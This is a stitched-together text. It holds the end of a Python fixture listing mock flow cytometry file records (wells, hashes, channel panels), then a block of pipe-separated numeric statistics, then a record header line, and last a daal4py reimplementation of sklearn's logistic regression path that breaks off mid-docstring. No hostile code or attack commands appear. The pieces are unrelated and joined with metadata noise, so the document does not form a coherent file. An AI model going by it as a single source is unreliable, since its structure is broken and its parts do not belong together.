"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A4_A04.fcs",
"hasFileInternalComp": True,
"md5": "4e02338052ec43d6ab4cf5ebb98064aa",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 98230,
},
{
"_id": "5d64abe2ca9df61349ed8e7f",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "06"},
{"name": "plate well", "value": "A06"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 180,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A6_A06.fcs",
"hasFileInternalComp": True,
"md5": "da0791509dd29ebca1c5d6d649d11b73",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 22625,
},
{
"_id": "5d64abe2ca9df61349ed8e80",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "07"},
{"name": "plate well", "value": "A07"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 3027,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A7_A07.fcs",
"hasFileInternalComp": True,
"md5": "b29b4a7ac056899cabf566b203493925",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 307329,
},
{
"_id": "5d64abe2ca9df61349ed8e81",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "08"},
{"name": "plate well", "value": "A08"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 3684,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A8_A08.fcs",
"hasFileInternalComp": True,
"md5": "1c5955a05bd3e2b46aa58eec88d494b0",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 373037,
},
{
"_id": "5d64abe2ca9df61349ed8e82",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "09"},
{"name": "plate well", "value": "A09"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 2196,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A9_A09.fcs",
"hasFileInternalComp": True,
"md5": "9156a780c62bd9bc8d4601d6dae03893",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 224229,
},
{
"_id": "5d64abe2ca9df61349ed8e83",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "10"},
{"name": "plate well", "value": "A10"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 1120,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A10_A10.fcs",
"hasFileInternalComp": True,
"md5": "3613a1e91e28bb78da20105654dd779c",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 116631,
},
{
"_id": "5d64abe2ca9df61349ed8e84",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "11"},
{"name": "plate well", "value": "A11"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 1135,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A11_A11.fcs",
"hasFileInternalComp": True,
"md5": "34283e8069da17a7315d4c456d3532c6",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 118131,
},
]
return fcs_files
| 53.52356
| 70
| 0.436108
| 2,726
| 30,669
| 4.887748
| 0.061996
| 0.247673
| 0.389072
| 0.05674
| 0.882618
| 0.80066
| 0.80066
| 0.80066
| 0.80066
| 0.80066
| 0
| 0.104051
| 0.344746
| 30,669
| 572
| 71
| 53.617133
| 0.558967
| 0
| 0
| 0.8
| 0
| 0
| 0.383384
| 0.040399
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001754
| false
| 0
| 0.001754
| 0
| 0.005263
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
0a5666a9bb2d4f804cd762d051afd60c8075c56f
| 46,943
|
py
|
Python
|
daal4py/sklearn/linear_model/_logistic_path_0_22.py
|
agorshk/daal4py
|
58a9b2301c47cd2d5144a403a59c210e10b75f8f
|
[
"Apache-2.0"
] | null | null | null |
daal4py/sklearn/linear_model/_logistic_path_0_22.py
|
agorshk/daal4py
|
58a9b2301c47cd2d5144a403a59c210e10b75f8f
|
[
"Apache-2.0"
] | null | null | null |
daal4py/sklearn/linear_model/_logistic_path_0_22.py
|
agorshk/daal4py
|
58a9b2301c47cd2d5144a403a59c210e10b75f8f
|
[
"Apache-2.0"
] | null | null | null |
#
#*******************************************************************************
# Copyright 2014-2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#******************************************************************************/
import numpy as np
import scipy.sparse as sparse
import scipy.optimize as optimize
import numbers
import warnings
from .logistic_loss import (_daal4py_loss_and_grad,
_daal4py_logistic_loss_extra_args,
_daal4py_cross_entropy_loss_extra_args,
_daal4py_loss_, _daal4py_grad_,
_daal4py_grad_hess_)
from sklearn import __version__ as sklearn_version
from distutils.version import LooseVersion
from sklearn.utils import (check_array,
check_consistent_length,
compute_class_weight,
check_random_state)
from sklearn.utils.validation import _check_sample_weight
from sklearn.linear_model._sag import sag_solver
from sklearn.utils.optimize import _newton_cg, _check_optimize_result
from sklearn.exceptions import ConvergenceWarning
from sklearn.linear_model._logistic import (
_check_solver,
_check_multi_class,
_fit_liblinear,
_logistic_loss_and_grad,
_logistic_loss,
_logistic_grad_hess,
_multinomial_loss,
_multinomial_loss_grad,
_multinomial_grad_hess,
_LOGISTIC_SOLVER_CONVERGENCE_MSG,
LogisticRegression as LogisticRegression_original)
from sklearn.preprocessing import (LabelEncoder, LabelBinarizer)
from sklearn.linear_model._base import (LinearClassifierMixin, SparseCoefMixin, BaseEstimator)
use_daal = True
# Code adapted from sklearn.linear_model.logistic prior to 0.21
def logistic_regression_path(X, y, pos_class=None, Cs=10, fit_intercept=True,
max_iter=100, tol=1e-4, verbose=0,
solver='lbfgs', coef=None,
class_weight=None, dual=False, penalty='l2',
intercept_scaling=1., multi_class='warn',
random_state=None, check_input=True,
max_squared_sum=None, sample_weight=None):
"""Compute a Logistic Regression model for a list of regularization
parameters.
This is an implementation that uses the result of the previous model
to speed up computations along the set of solutions, making it faster
than sequentially calling LogisticRegression for the different parameters.
Note that there will be no speedup with liblinear solver, since it does
not handle warm-starting.
Read more in the :ref:`User Guide <logistic_regression>`.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Input data.
y : array-like, shape (n_samples,) or (n_samples, n_targets)
Input data, target values.
pos_class : int, None
The class with respect to which we perform a one-vs-all fit.
If None, then it is assumed that the given problem is binary.
Cs : int | array-like, shape (n_cs,)
List of values for the regularization parameter or integer specifying
the number of regularization parameters that should be used. In this
case, the parameters will be chosen in a logarithmic scale between
1e-4 and 1e4.
fit_intercept : bool
Whether to fit an intercept for the model. In this case the shape of
the returned array is (n_cs, n_features + 1).
max_iter : int
Maximum number of iterations for the solver.
tol : float
Stopping criterion. For the newton-cg and lbfgs solvers, the iteration
will stop when ``max{|g_i | i = 1, ..., n} <= tol``
where ``g_i`` is the i-th component of the gradient.
verbose : int
For the liblinear and lbfgs solvers set verbose to any positive
number for verbosity.
solver : {'lbfgs', 'newton-cg', 'liblinear', 'sag', 'saga'}
Numerical solver to use.
coef : array-like, shape (n_features,), default None
Initialization value for coefficients of logistic regression.
Useless for liblinear solver.
class_weight : dict or 'balanced', optional
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``.
Note that these weights will be multiplied with sample_weight (passed
through the fit method) if sample_weight is specified.
dual : bool
Dual or primal formulation. Dual formulation is only implemented for
l2 penalty with liblinear solver. Prefer dual=False when
n_samples > n_features.
penalty : str, 'l1' or 'l2'
Used to specify the norm used in the penalization. The 'newton-cg',
'sag' and 'lbfgs' solvers support only l2 penalties.
intercept_scaling : float, default 1.
Useful only when the solver 'liblinear' is used
and self.fit_intercept is set to True. In this case, x becomes
[x, self.intercept_scaling],
i.e. a "synthetic" feature with constant value equal to
intercept_scaling is appended to the instance vector.
The intercept becomes ``intercept_scaling * synthetic_feature_weight``.
Note! the synthetic feature weight is subject to l1/l2 regularization
as all other features.
To lessen the effect of regularization on synthetic feature weight
(and therefore on the intercept) intercept_scaling has to be increased.
multi_class : str, {'ovr', 'multinomial', 'auto'}, default: 'ovr'
If the option chosen is 'ovr', then a binary problem is fit for each
label. For 'multinomial' the loss minimised is the multinomial loss fit
across the entire probability distribution, *even when the data is
binary*. 'multinomial' is unavailable when solver='liblinear'.
'auto' selects 'ovr' if the data is binary, or if solver='liblinear',
and otherwise selects 'multinomial'.
.. versionadded:: 0.18
Stochastic Average Gradient descent solver for 'multinomial' case.
.. versionchanged:: 0.20
Default will change from 'ovr' to 'auto' in 0.22.
random_state : int, RandomState instance or None, optional, default None
The seed of the pseudo random number generator to use when shuffling
the data. If int, random_state is the seed used by the random number
generator; If RandomState instance, random_state is the random number
generator; If None, the random number generator is the RandomState
instance used by `np.random`. Used when ``solver`` == 'sag' or
'liblinear'.
check_input : bool, default True
If False, the input arrays X and y will not be checked.
max_squared_sum : float, default None
Maximum squared sum of X over samples. Used only in SAG solver.
If None, it will be computed, going through all the samples.
The value should be precomputed to speed up cross validation.
sample_weight : array-like, shape(n_samples,) optional
Array of weights that are assigned to individual samples.
If not provided, then each sample is given unit weight.
Returns
-------
coefs : ndarray, shape (n_cs, n_features) or (n_cs, n_features + 1)
List of coefficients for the Logistic Regression model. If
fit_intercept is set to True then the second dimension will be
n_features + 1, where the last item represents the intercept. For
``multiclass='multinomial'``, the shape is (n_classes, n_cs,
n_features) or (n_classes, n_cs, n_features + 1).
Cs : ndarray
Grid of Cs used for cross-validation.
n_iter : array, shape (n_cs,)
Actual number of iteration for each Cs.
Notes
-----
You might get slightly different results with the solver liblinear than
with the others since this uses LIBLINEAR which penalizes the intercept.
.. versionchanged:: 0.19
The "copy" parameter was removed.
"""
if isinstance(Cs, numbers.Integral):
Cs = np.logspace(-4, 4, Cs)
solver = _check_solver(solver, penalty, dual)
# Preprocessing.
if check_input:
X = check_array(X, accept_sparse='csr', dtype=np.float64,
accept_large_sparse=solver != 'liblinear')
y = check_array(y, ensure_2d=False, dtype=None)
check_consistent_length(X, y)
_, n_features = X.shape
classes = np.unique(y)
random_state = check_random_state(random_state)
multi_class = _check_multi_class(multi_class, solver, len(classes))
if pos_class is None and multi_class != 'multinomial':
if (classes.size > 2):
raise ValueError('To fit OvR, use the pos_class argument')
# np.unique(y) gives labels in sorted order.
pos_class = classes[1]
# If sample weights exist, convert them to array (support for lists)
# and check length
# Otherwise set them to 1 for all examples
if sample_weight is not None:
sample_weight = np.array(sample_weight, dtype=X.dtype, order='C')
check_consistent_length(y, sample_weight)
default_weights = False
else:
default_weights = (class_weight is None)
sample_weight = np.ones(X.shape[0], dtype=X.dtype)
daal_ready = use_daal and solver in ['lbfgs', 'newton-cg'] and not sparse.issparse(X)
# If class_weights is a dict (provided by the user), the weights
# are assigned to the original labels. If it is "balanced", then
# the class_weights are assigned after masking the labels with a OvR.
le = LabelEncoder()
if isinstance(class_weight, dict) or multi_class == 'multinomial':
class_weight_ = compute_class_weight(class_weight, classes, y)
sample_weight *= class_weight_[le.fit_transform(y)]
# For doing a ovr, we need to mask the labels first. for the
# multinomial case this is not necessary.
if multi_class == 'ovr':
mask_classes = np.array([-1, 1])
mask = (y == pos_class)
y_bin = np.ones(y.shape, dtype=X.dtype)
y_bin[~mask] = -1.
# for compute_class_weight
if class_weight == "balanced":
class_weight_ = compute_class_weight(class_weight, mask_classes,
y_bin)
sample_weight *= class_weight_[le.fit_transform(y_bin)]
daal_ready = daal_ready and (default_weights or np.allclose(sample_weight, np.ones_like(sample_weight)))
if daal_ready:
w0 = np.zeros(n_features + 1, dtype=X.dtype)
y_bin[~mask] = 0.
else:
w0 = np.zeros(n_features + int(fit_intercept), dtype=X.dtype)
else:
daal_ready = daal_ready and (default_weights or np.allclose(sample_weight, np.ones_like(sample_weight)))
if solver not in ['sag', 'saga']:
if daal_ready:
Y_multi = le.fit_transform(y).astype(X.dtype, copy=False)
else:
lbin = LabelBinarizer()
Y_multi = lbin.fit_transform(y)
if Y_multi.shape[1] == 1:
Y_multi = np.hstack([1 - Y_multi, Y_multi])
else:
# SAG multinomial solver needs LabelEncoder, not LabelBinarizer
Y_multi = le.fit_transform(y).astype(X.dtype, copy=False)
if daal_ready:
w0 = np.zeros((classes.size, n_features + 1),
order='C', dtype=X.dtype)
else:
w0 = np.zeros((classes.size, n_features + int(fit_intercept)),
order='F', dtype=X.dtype)
if coef is not None:
# it must work both giving the bias term and not
if multi_class == 'ovr':
if coef.size not in (n_features, w0.size):
raise ValueError(
'Initialization coef is of shape %d, expected shape '
'%d or %d' % (coef.size, n_features, w0.size))
if daal_ready:
w0[-coef.size:] = np.roll(coef, 1, -1) if coef.size != n_features else coef
else:
w0[:coef.size] = coef
else:
# For binary problems coef.shape[0] should be 1, otherwise it
# should be classes.size.
n_classes = classes.size
if n_classes == 2:
n_classes = 1
if (coef.shape[0] != n_classes or
coef.shape[1] not in (n_features, n_features + 1)):
raise ValueError(
'Initialization coef is of shape (%d, %d), expected '
'shape (%d, %d) or (%d, %d)' % (
coef.shape[0], coef.shape[1], classes.size,
n_features, classes.size, n_features + 1))
if daal_ready:
w0[:, -coef.shape[1]:] = np.roll(coef, 1, -1) if coef.shape[1] != n_features else coef
else:
if n_classes == 1:
w0[0, :coef.shape[1]] = -coef
w0[1, :coef.shape[1]] = coef
else:
w0[:, :coef.shape[1]] = coef
C_daal_multiplier = 1
# commented out because this is Py3 feature
#def _map_to_binary_logistic_regression():
# nonlocal C_daal_multiplier
# nonlocal w0
# C_daal_multiplier = 2
# w0 *= 2
if multi_class == 'multinomial':
# fmin_l_bfgs_b and newton-cg accepts only ravelled parameters.
if solver in ['lbfgs', 'newton-cg']:
if daal_ready and classes.size == 2:
w0_saved = w0
w0 = w0[-1:, :]
w0 = w0.ravel()
target = Y_multi
if solver == 'lbfgs':
if daal_ready:
if classes.size == 2:
# _map_to_binary_logistic_regression()
C_daal_multiplier = 2
w0 *= 2
daal_extra_args_func = _daal4py_logistic_loss_extra_args
else:
daal_extra_args_func = _daal4py_cross_entropy_loss_extra_args
func = _daal4py_loss_and_grad
else:
func = lambda x, *args: _multinomial_loss_grad(x, *args)[0:2]
elif solver == 'newton-cg':
if daal_ready:
if classes.size == 2:
# _map_to_binary_logistic_regression()
C_daal_multiplier = 2
w0 *= 2
daal_extra_args_func = _daal4py_logistic_loss_extra_args
else:
daal_extra_args_func = _daal4py_cross_entropy_loss_extra_args
func = _daal4py_loss_
grad = _daal4py_grad_
hess = _daal4py_grad_hess_
else:
func = lambda x, *args: _multinomial_loss(x, *args)[0]
grad = lambda x, *args: _multinomial_loss_grad(x, *args)[1]
hess = _multinomial_grad_hess
warm_start_sag = {'coef': w0.T}
else:
target = y_bin
if solver == 'lbfgs':
if daal_ready:
func = _daal4py_loss_and_grad
daal_extra_args_func = _daal4py_logistic_loss_extra_args
else:
func = _logistic_loss_and_grad
elif solver == 'newton-cg':
if daal_ready:
daal_extra_args_func = _daal4py_logistic_loss_extra_args
func = _daal4py_loss_
grad = _daal4py_grad_
hess = _daal4py_grad_hess_
else:
func = _logistic_loss
grad = lambda x, *args: _logistic_loss_and_grad(x, *args)[1]
hess = _logistic_grad_hess
warm_start_sag = {'coef': np.expand_dims(w0, axis=1)}
coefs = list()
n_iter = np.zeros(len(Cs), dtype=np.int32)
for i, C in enumerate(Cs):
if solver == 'lbfgs':
if daal_ready:
extra_args = daal_extra_args_func(classes.size, w0, X, target, 0., 0.5 / C / C_daal_multiplier,
fit_intercept, value=True, gradient=True, hessian=False)
else:
extra_args = (X, target, 1. / C, sample_weight)
iprint = [-1, 50, 1, 100, 101][
np.searchsorted(np.array([0, 1, 2, 3]), verbose)]
w0, loss, info = optimize.fmin_l_bfgs_b(
func, w0, fprime=None,
args=extra_args,
iprint=iprint, pgtol=tol, maxiter=max_iter)
if daal_ready and C_daal_multiplier == 2:
w0 *= 0.5
if info["warnflag"] == 1:
warnings.warn("lbfgs failed to converge. Increase the number "
"of iterations.", ConvergenceWarning)
# In scipy <= 1.0.0, nit may exceed maxiter.
# See https://github.com/scipy/scipy/issues/7854.
n_iter_i = min(info['nit'], max_iter)
elif solver == 'newton-cg':
if daal_ready:
def make_ncg_funcs(f, value=False, gradient=False, hessian=False):
daal_penaltyL2 = 0.5 / C / C_daal_multiplier
_obj_, X_, y_, n_samples = daal_extra_args_func(
classes.size, w0, X, target, 0., daal_penaltyL2, fit_intercept,
value=value, gradient=gradient, hessian=hessian)
_func_ = lambda x, *args: f(x, _obj_, *args)
return _func_, (X_, y_, n_samples, daal_penaltyL2)
loss_func, extra_args = make_ncg_funcs(func, value=True)
grad_func, _ = make_ncg_funcs(grad, gradient=True)
grad_hess_func, _ = make_ncg_funcs(hess, gradient=True)
w0, n_iter_i = _newton_cg(grad_hess_func, loss_func, grad_func, w0, args=extra_args,
maxiter=max_iter, tol=tol)
else:
args = (X, target, 1. / C, sample_weight)
w0, n_iter_i = _newton_cg(hess, func, grad, w0, args=args,
maxiter=max_iter, tol=tol)
elif solver == 'liblinear':
coef_, intercept_, n_iter_i, = _fit_liblinear(
X, target, C, fit_intercept, intercept_scaling, None,
penalty, dual, verbose, max_iter, tol, random_state,
sample_weight=sample_weight)
if fit_intercept:
w0 = np.concatenate([coef_.ravel(), intercept_])
else:
w0 = coef_.ravel()
elif solver in ['sag', 'saga']:
if multi_class == 'multinomial':
target = target.astype(np.float64)
loss = 'multinomial'
else:
loss = 'log'
if penalty == 'l1':
alpha = 0.
beta = 1. / C
else:
alpha = 1. / C
beta = 0.
w0, n_iter_i, warm_start_sag = sag_solver(
X, target, sample_weight, loss, alpha,
beta, max_iter, tol,
verbose, random_state, False, max_squared_sum, warm_start_sag,
is_saga=(solver == 'saga'))
else:
raise ValueError("solver must be one of {'liblinear', 'lbfgs', "
"'newton-cg', 'sag'}, got '%s' instead" % solver)
if multi_class == 'multinomial':
if daal_ready:
if classes.size == 2:
multi_w0 = w0[np.newaxis, :]
else:
multi_w0 = np.reshape(w0, (classes.size, -1))
else:
n_classes = max(2, classes.size)
multi_w0 = np.reshape(w0, (n_classes, -1))
if n_classes == 2:
multi_w0 = multi_w0[1][np.newaxis, :]
coefs.append(np.require(multi_w0, requirements='O'))
else:
coefs.append(np.require(w0, requirements='O'))
n_iter[i] = n_iter_i
if daal_ready:
if fit_intercept:
for i, ci in enumerate(coefs):
coefs[i] = np.roll(ci, -1, -1)
else:
for i, ci in enumerate(coefs):
coefs[i] = np.delete(ci, 0, axis=-1)
return coefs, np.array(Cs), n_iter
# Code adapted from sklearn.linear_model.logistic version 0.21
def __logistic_regression_path(X, y, pos_class=None, Cs=10, fit_intercept=True,
max_iter=100, tol=1e-4, verbose=0,
solver='lbfgs', coef=None,
class_weight=None, dual=False, penalty='l2',
intercept_scaling=1., multi_class='warn',
random_state=None, check_input=True,
max_squared_sum=None, sample_weight=None,
l1_ratio=None):
"""Compute a Logistic Regression model for a list of regularization
parameters.
This is an implementation that uses the result of the previous model
to speed up computations along the set of solutions, making it faster
than sequentially calling LogisticRegression for the different parameters.
Note that there will be no speedup with liblinear solver, since it does
not handle warm-starting.
Read more in the :ref:`User Guide <logistic_regression>`.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Input data.
y : array-like, shape (n_samples,) or (n_samples, n_targets)
Input data, target values.
pos_class : int, None
The class with respect to which we perform a one-vs-all fit.
